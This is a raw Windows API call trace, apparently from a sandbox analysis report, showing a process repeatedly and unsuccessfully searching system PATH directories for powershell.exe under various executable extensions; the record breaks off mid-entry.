[0236.195] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.msc" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.195] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.exe.msc" (normalized: "c:\\programdata\\oracle\\java\\javapath\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.195] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.196] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.196] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.196] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.196] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.196] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.196] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.196] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.196] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.196] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.196] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.197] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.197] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.197] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.197] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.197] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.197] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.197] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.197] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.197] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.197] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.198] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.198] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.198] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.200] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.200] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.200] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.200] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.200] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.200] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.201] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.201] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.202] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.202] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.202] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.202] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.202] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.202] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.202] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.203] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.203] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.203] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.203] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.203] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.203] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.203] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.203] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 